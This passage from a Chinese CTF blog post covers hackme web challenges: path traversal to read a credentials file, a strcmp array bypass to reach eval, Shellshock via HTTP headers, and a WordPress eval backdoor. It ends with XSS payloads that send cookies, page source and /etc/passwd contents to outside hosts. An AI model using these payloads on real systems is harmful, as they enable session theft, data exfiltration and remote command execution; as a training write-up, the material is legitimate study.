<p>在$dir为空的情况下其实就是用is_file对data/guest/$item进行判断，那么这个条件也肯定是满足的</p>
<p><strong>跟进get_show_item</strong></p>
<p>发现劝退代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$abs_item = get_abs_item($dir, $item);<span class="comment">//     /$item</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!file_in_web($abs_item) || stristr($abs_item, <span class="string">'.php'</span>) || stristr($abs_item, <span class="string">'config'</span>)) show_error($item . <span class="string">": "</span> . $GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"accessfile"</span>]);</span><br><span class="line">$browser = id_browser();</span><br></pre></td></tr></table></figure>

<p>如果发现.php或者config直接不解释返回false，正好我们需要这两个字符串，所以download这个地方是不行了，接着换个思路，全局搜索一下readfile,file_get_contents，fopen这样的函数</p>
<p><strong>最后在fun_edit.php中的edit_file中发现fopen，重新回到入口，发现action为edit也正好对应edit_file这个函数，跟进edit_file</strong></p>
<p>前三个条件都是正常符合的，在get_show_item中其实他是存在过滤的，只不过可能过滤的不太对，比如下面这段代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_show_item</span><span class="params">($dir, $item)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> ($item == <span class="string">"."</span> || $item == <span class="string">".."</span>) <span class="keyword">return</span> <span class="keyword">false</span>;</span><br></pre></td></tr></table></figure>

<p>基本相当于没作用吧，接着回去</p>
<p>在$dir置空的情况下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$fname = get_abs_item($dir, $item);</span><br></pre></td></tr></table></figure>

<p>$fname=data/guest.$item</p>
<p>接下来调用file_in_web函数判断fname</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!file_in_web($fname)) show_error($GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"accessfile"</span>]);</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">file_in_web</span><span class="params">($file)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $file = realpath($file);</span><br><span class="line">    <span class="keyword">if</span>(strpos($file, ROOT) !== <span class="number">0</span>) <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们要读的路径字符串里面是有ROOT的，所以返回true符合条件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($GLOBALS[<span class="string">'__POST'</span>][<span class="string">"dosave"</span>]) &amp;&amp; $GLOBALS[<span class="string">'__POST'</span>][<span class="string">"dosave"</span>] == <span class="string">"yes"</span>) &#123;</span><br><span class="line">    $item = basename(stripslashes($GLOBALS[<span class="string">'__POST'</span>][<span class="string">"fname"</span>]));</span><br><span class="line">    $fname2 = get_abs_item($dir, $item);</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>($item) || $item == <span class="string">""</span>) show_error($GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"miscnoname"</span>]);</span><br><span class="line">    <span class="keyword">if</span> ($fname != $fname2 &amp;&amp; @file_exists($fname2)) show_error($item . <span class="string">": "</span> . $GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"itemdoesexist"</span>]);</span><br><span class="line">    savefile($dir, $fname2);</span><br><span class="line">    $fname = $fname2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个不post直接就向下执行了</p>
<p>通过如下代码输出文件内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$fp = @fopen($fname, <span class="string">"r"</span>);</span><br><span class="line">$buffer = <span class="string">""</span>;</span><br><span class="line"><span class="keyword">while</span> (!feof($fp)) &#123;</span><br><span class="line">    $buffer.= fgets($fp, <span class="number">4096</span>);</span><br><span class="line">&#125;</span><br><span class="line">@fclose($fp);</span><br><span class="line"><span class="keyword">echo</span> htmlspecialchars($buffer);</span><br></pre></td></tr></table></figure>

<p>以后我全局搜索再加个buffer.233</p>
<p>payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:<span class="comment">//dafuq-manager.hackme.inndy.tw/index.php?action=edit&amp;item=../../../../../var/www/webhdisk/.config/.htusers.php</span></span><br></pre></td></tr></table></figure>

<p>/var/www/webhdisk/data/guest一共有五层，所以需要向上跳五层，最终拿到文件内容</p>
<p><img src="https://s2.ax1x.com/2019/10/22/KGedv4.png" alt="KGedv4.png"></p>
<h3 id="dafuq-manager-3"><a href="#dafuq-manager-3" class="headerlink" title="dafuq-manager 3"></a>dafuq-manager 3</h3><p>拿shell命令执行，全局搜索eval,assert之类的，发现在debug的地方存在问题</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">do_debug</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    assert(strlen($GLOBALS[<span class="string">'secret_key'</span>]) &gt; <span class="number">40</span>);</span><br><span class="line">    $dir = $GLOBALS[<span class="string">'__GET'</span>][<span class="string">'dir'</span>];</span><br><span class="line">    <span class="keyword">if</span> (strcmp($dir, <span class="string">"magically"</span>) || strcmp($dir, <span class="string">"hacker"</span>) || strcmp($dir, <span class="string">"admin"</span>)) &#123;</span><br><span class="line">        show_error(<span class="string">'You are not hacky enough :('</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">list</span>($cmd, $hmac) = explode(<span class="string">'.'</span>, $GLOBALS[<span class="string">'__GET'</span>][<span class="string">'command'</span>], <span class="number">2</span>);</span><br><span class="line">    $cmd = base64_decode($cmd);</span><br><span class="line">    $bad_things = <span class="keyword">array</span>(<span class="string">'system'</span>, <span class="string">'exec'</span>, <span class="string">'popen'</span>, <span class="string">'pcntl_exec'</span>, <span class="string">'proc_open'</span>, <span class="string">'passthru'</span>, <span class="string">'`'</span>, <span class="string">'eval'</span>, <span class="string">'assert'</span>, <span class="string">'preg_replace'</span>, <span class="string">'create_function'</span>, <span class="string">'include'</span>, <span class="string">'require'</span>, <span class="string">'curl'</span>,);</span><br><span class="line">    <span class="keyword">foreach</span> ($bad_things <span class="keyword">as</span> $bad) &#123;</span><br><span class="line">        <span class="keyword">if</span> (stristr($cmd, $bad)) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'2bad'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (hash_equals(hash_hmac(<span class="string">'sha256'</span>, $cmd, $GLOBALS[<span class="string">"secret_key"</span>]), $hmac)) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="keyword">eval</span>($cmd));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        show_error(<span class="string">'What does the fox say?'</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个代码就比较简单了，secret我们知道，主要bypass的代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (strcmp($dir, <span class="string">"magically"</span>) || strcmp($dir, <span class="string">"hacker"</span>) || strcmp($dir, <span class="string">"admin"</span>)) &#123;</span><br><span class="line">    show_error(<span class="string">'You are not hacky enough :('</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个必须三个都返回0才能避免show_error，但是一个字符串不可能同时是这三个字符串，不过strcmp有经典的数组绕过，直接就可以bypass了，传给dir[]=1,其他的照常，就可以成功命令执行了。</p>
<h3 id="command-executor"><a href="#command-executor" class="headerlink" title="command-executor"></a>command-executor</h3><p>这题提供了几个功能</p>
<ul>
<li>Tar File</li>
<li>Cmd exec(只能执行ls和env)</li>
<li>ls（查看各个目录的内容)</li>
</ul>
<p>首先通过ls功能发现根目录有flag和flag-reader，而且可以通过php伪协议读源码</p>
<p>主要代码还是index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$pages = [</span><br><span class="line">    [<span class="string">'man'</span>, <span class="string">'Man'</span>],</span><br><span class="line">    [<span class="string">'untar'</span>, <span class="string">'Tar Tester'</span>],</span><br><span class="line">    [<span class="string">'cmd'</span>, <span class="string">'Cmd Exec'</span>],</span><br><span class="line">    [<span class="string">'ls'</span>, <span class="string">'List files'</span>],</span><br><span class="line">];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">fuck</span><span class="params">($msg)</span> </span>&#123;</span><br><span class="line">    header(<span class="string">'Content-Type: text/plain'</span>);</span><br><span class="line">    <span class="keyword">echo</span> $msg;</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$black_list = [</span><br><span class="line">    <span class="string">'\/flag'</span>, <span class="string">'\(\)\s*\&#123;\s*:;\s*\&#125;;'</span></span><br><span class="line">];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">waf</span><span class="params">($a)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $black_list;</span><br><span class="line">    <span class="keyword">if</span>(is_array($a)) &#123;</span><br><span class="line">        <span class="keyword">foreach</span>($a <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">            waf($key);</span><br><span class="line">            waf($val);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">foreach</span>($black_list <span class="keyword">as</span> $b) &#123;</span><br><span class="line">            <span class="keyword">if</span>(preg_match(<span class="string">"/$b/"</span>, $a) === <span class="number">1</span>) &#123;</span><br><span class="line">                fuck(<span class="string">"$b detected! exit now."</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">waf($_SERVER);</span><br><span class="line">waf($_GET);</span><br><span class="line">waf($_POST);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">execute</span><span class="params">($cmd, $shell=<span class="string">'bash'</span>)</span> </span>&#123;</span><br><span class="line">    system(sprintf(<span class="string">'%s -c %s'</span>, $shell, escapeshellarg($cmd)));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>($_SERVER <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">    <span class="keyword">if</span>(substr($key, <span class="number">0</span>, <span class="number">5</span>) === <span class="string">'HTTP_'</span>) &#123;</span><br><span class="line">        putenv(<span class="string">"$key=$val"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$page = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'func'</span>])) &#123;</span><br><span class="line">    $page = $_GET[<span class="string">'func'</span>];</span><br><span class="line">    <span class="keyword">if</span>(strstr($page, <span class="string">'..'</span>) !== <span class="keyword">false</span>) &#123;</span><br><span class="line">        $page = <span class="string">''</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($page &amp;&amp; strlen($page) &gt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="string">"$page.php"</span>);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (<span class="keyword">Exception</span> $e) &#123;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">render_default</span><span class="params">()</span> </span>&#123; <span class="meta">?&gt;</span></span><br><span class="line">&lt;p&gt;Welcome to <span class="keyword">use</span> <span class="title">our</span> <span class="title">developer</span> <span class="title">assistant</span> <span class="title">service</span>. <span class="title">We</span> <span class="title">provide</span> <span class="title">servial</span> <span class="title">useless</span> <span class="title">features</span> <span class="title">to</span> <span class="title">make</span> <span class="title">your</span> <span class="title">developing</span> <span class="title">life</span> <span class="title">harder</span>.&lt;/<span class="title">p</span>&gt;</span><br><span class="line"></span><br><span class="line">&lt;<span class="title">img</span> <span class="title">src</span>="<span class="title">windows</span>-<span class="title">run</span>.<span class="title">jpg</span>" <span class="title">alt</span>="<span class="title">command</span> <span class="title">executor</span>"&gt;</span><br><span class="line">&lt;?<span class="title">php</span> &#125;</span><br><span class="line">?&gt;&lt;!<span class="title">DOCTYPE</span> <span class="title">html</span>&gt;</span><br><span class="line">&lt;<span class="title">html</span> <span class="title">lang</span>="<span class="title">en</span>"&gt;</span><br><span class="line">  &lt;<span class="title">head</span>&gt;</span><br><span class="line">    &lt;<span class="title">meta</span> <span class="title">charset</span>="<span class="title">UTF</span>-8"&gt;</span><br><span class="line">    &lt;<span class="title">title</span>&gt;<span class="title">Command</span> <span class="title">Executor</span>&lt;/<span class="title">title</span>&gt;</span><br><span class="line">    &lt;<span class="title">link</span> <span class="title">rel</span>="<span class="title">stylesheet</span>" <span class="title">href</span>="<span class="title">bootstrap</span>/<span class="title">css</span>/<span class="title">bootstrap</span>.<span class="title">min</span>.<span class="title">css</span>" <span class="title">media</span>="<span class="title">all</span>"&gt;</span><br><span class="line">    &lt;<span class="title">link</span> <span class="title">rel</span>="<span class="title">stylesheet</span>" <span class="title">href</span>="<span class="title">comic</span>-<span class="title">neue</span>/<span class="title">font</span>.<span class="title">css</span>" <span class="title">media</span>="<span class="title">all</span>"&gt;</span><br><span class="line">    &lt;<span class="title">style</span>&gt;</span><br><span class="line">      <span class="title">nav</span> &#123; <span class="title">margin</span>-<span class="title">bottom</span>: 1<span class="title">rem</span>; &#125;</span><br><span class="line">      img &#123; max-width: <span class="number">100</span>%; &#125;</span><br><span class="line">    &lt;/style&gt;</span><br><span class="line">  &lt;/head&gt;</span><br><span class="line">  &lt;body&gt;</span><br><span class="line">    &lt;nav class="navbar navbar-expand-lg navbar-dark bg-dark d-flex"&gt;</span><br><span class="line">      &lt;a class="navbar-brand" href="index.php"&gt;Command Executor&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">      &lt;ul class="navbar-nav"&gt;</span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">foreach</span>($pages <span class="keyword">as</span> <span class="keyword">list</span>($file, $title)): <span class="meta">?&gt;</span></span><br><span class="line">        &lt;li class="nav-item"&gt;</span><br><span class="line">          &lt;a class="nav-link" href="index.php?func=&lt;?=$file?&gt;"&gt;&lt;?=$title?&gt;&lt;/a&gt;</span><br><span class="line">        &lt;/li&gt;</span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">endforeach</span>; <span class="meta">?&gt;</span></span><br><span class="line">      &lt;/ul&gt;</span><br><span class="line">    &lt;/nav&gt;</span><br><span class="line"></span><br><span class="line">    &lt;div class="container"&gt;&lt;?php if(is_callable('render')) render(); else render_default(); ?&gt;&lt;/div&gt;</span><br><span class="line">  &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>首先大概看一下index.php的逻辑</p>
<p>这个black_list其实已经很明显的在提示这是一个bash破壳漏洞了…</p>
<p>上Freebuf学一波，讲的很清楚</p>
<p><a href="https://www.freebuf.com/articles/system/50065.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/50065.html</a></p>
<p>如果在全局变量中发现/flag关键字，或者</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\(\)\s*\&#123;\s*:;\s*\&#125;;</span><br></pre></td></tr></table></figure>

<p>满足这个形式的正则，就被detected</p>
<p>关键代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span>($_SERVER <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">    <span class="keyword">if</span>(substr($key, <span class="number">0</span>, <span class="number">5</span>) === <span class="string">'HTTP_'</span>) &#123;</span><br><span class="line">        putenv(<span class="string">"$key=$val"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>bash破壳漏洞利用</p>
<p><img src="https://s2.ax1x.com/2019/10/24/KUtDSO.png" alt="KUtDSO.png"></p>
<p>题目中的putenv就充当了这里export的作用，我们可以把user-agent会换成我们的payload</p>
<p>同时bash -c env，最终反弹shell(还有中间加个空格就可以bypass正则了)</p>
<p><img src="https://s2.ax1x.com/2019/10/24/KUtjhV.png" alt="KUtjhV.png"></p>
<p>最终拿flag的payload为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag-reader flag &gt; &#x2F;var&#x2F;tmp&#x2F;test &lt; &#x2F;var&#x2F;tmp&#x2F;test</span><br></pre></td></tr></table></figure>

<h3 id="Wordpress1"><a href="#Wordpress1" class="headerlink" title="Wordpress1"></a>Wordpress1</h3><p><strong>plugins/core.php中发现问题代码，是个打印flag的函数</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">print_f14g</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	$h = <span class="string">'m'</span>.sprintf(<span class="string">'%s%d'</span>,<span class="string">'d'</span>,<span class="number">-4</span>+<span class="number">9e0</span>);</span><br><span class="line">	<span class="keyword">if</span>($h($_GET[<span class="string">'passw0rd'</span>]) === <span class="string">'5ada11fd9c69c78ea65c832dd7f9bbde'</span>) &#123;</span><br><span class="line">		<span class="keyword">if</span>(wp_get_user_ip() === <span class="string">'127.0.0.1'</span>) &#123;</span><br><span class="line">			<span class="keyword">eval</span>(mcrypt_decrypt(MCRYPT_RIJNDAEL_256, $h($_GET[<span class="string">'passw0rd'</span>].AUTH_KEY), base64_decode(<span class="string">'zEFnGVANrtEUTMLVyBusu4pqpHjqhn3X+cCtepGKg89VgIi6KugA+hITeeKIpnQIQM8UZbUkRpuCe/d8Rf5HFQJSawpeHoUg5NtcGam0eeTw+1bnFPT3dcPNB8IekPBDyXTyV44s3yaYMUAXZWthWHEVDFfKSjfTpPmQkB8fp6Go/qytRtiP3LyYmofhOOOV8APh0Pv34VPjCtxcJUpqIw=='</span>), MCRYPT_MODE_CBC, $h($_GET[<span class="string">'passw0rd'</span>].AUTH_SALT)));</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			<span class="keyword">die</span>(<span class="string">'&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Sorry, Only admin from localhost can get flag'</span>);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先看一下这个$h…硬拼出来的md5可还行，解密一下这个md5发现是cat flag，最后eval解密后md5的值，也就是说传入一个cat flag就可以，再加上伪造一个ip。</p>
<h3 id="xss"><a href="#xss" class="headerlink" title="xss"></a>xss</h3><p>这三道连一起真的挺好…但是xssbot挂了吧？….</p>
<p>记录一下有意思的Payload吧</p>
<p>第一关的xss可以通过svg绕过，或者img绕过，当然其他也有很多标签可以绕过</p>
<p><strong>img绕过</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;&quot;&quot;onerror&#x3D;&quot;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>本来这里是过滤掉了onerror不过可以通过去掉前面的空格bypass，至于括号的过滤，直接html编码就可以了</p>
<p>这里的html编码对应的alert(1)，如果我们想打cookie,可以用如下payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;&quot;document.location&#x3D;&#39;http:&#x2F;&#x2F;xxx.ceye.io&#x2F;&#39;+document.cookie&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>或者说</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> img = <span class="built_in">document</span>.createElement(<span class="string">"img"</span>);</span><br><span class="line">img.src=<span class="string">"http://ip:port/"</span>+<span class="built_in">escape</span>(<span class="built_in">document</span>.body.innerHTML);</span><br><span class="line"><span class="built_in">document</span>.body.appendChild(img);</span><br></pre></td></tr></table></figure>

<p><strong>svg绕过</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg&#x2F;onload&#x3D;&quot;document.location&#x3D;&#39;http:&#x2F;&#x2F;ip:port&#39;+document.cookie&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><strong>xss打源码</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg&#x2F;onload&#x3D;&quot;document.location&#x3D;&#39;http:&#x2F;&#x2F;xx.ceye.io&#x2F;?&#39;+btoa(document.body.innerHTML)&quot;&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">var img &#x3D; document.createElement(&quot;img&quot;);</span><br><span class="line">img.src&#x3D;&quot;http:&#x2F;&#x2F;ip:port&#x2F;&quot;+escape(document.body.innerHTML);</span><br><span class="line">document.body.appendChild(img);</span><br></pre></td></tr></table></figure>

<p><strong>通过ajax打出回显内容</strong></p>
<p><strong>GET型</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg/onload=<span class="string">"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">xmlhttp=new XMLHttpRequest();</span></span><br><span class="line"><span class="string">xmlhttp.onreadystatechange=function()</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">if (xmlhttp.readyState==4 &amp;&amp; xmlhttp.status==200)</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">document.location='http://xxx/?'+btoa(xmlhttp.responseText);</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">xmlhttp.open("</span>GET<span class="string">","</span>request.php<span class="string">",true);</span></span><br><span class="line"><span class="string">xmlhttp.send();</span></span><br><span class="line"><span class="string">"</span>&gt;</span><br></pre></td></tr></table></figure>

<p><strong>POST型</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg/onload=<span class="string">"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">xmlhttp=new XMLHttpRequest();</span></span><br><span class="line"><span class="string">xmlhttp.onreadystatechange=function()</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">if (xmlhttp.readyState==4 &amp;&amp; xmlhttp.status==200)</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">document.location='http://xx/?'+btoa(xmlhttp.responseText);</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">xmlhttp.open("</span>POST<span class="string">","</span>request.php<span class="string">",true);</span></span><br><span class="line"><span class="string">xmlhttp.setRequestHeader("</span>Content-type<span class="string">","</span>application/x-www-form-urlencoded<span class="string">");</span></span><br><span class="line"><span class="string">xmlhttp.send("</span>url=file:<span class="comment">///etc/passwd");</span></span><br><span class="line"><span class="string">"&gt;</span></span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      
        <a data-url="http://yoursite.com/2019/10/27/Hackme-web/" data-id="ckabsu3870018kkvr0wa0ek8t" class="article-share-link" data-share="baidu" data-title="Hackme-web">Share</a>
      

      
        <a href="http://yoursite.com/2019/10/27/Hackme-web/#ds-thread" class="article-comment-link">Comments</a>
      

      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/10/27/BalsnCTF2019-%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2%E5%A4%8D%E7%8E%B0/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          BalsnCTF2019+巅峰极客复现
        
      </div>
    </a>
  
  
    <a href="/2019/10/20/prompt-1-to-win/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">prompt(1) to win</div>
    </a>
  
</nav>

  
</article>


  <section id="comments">
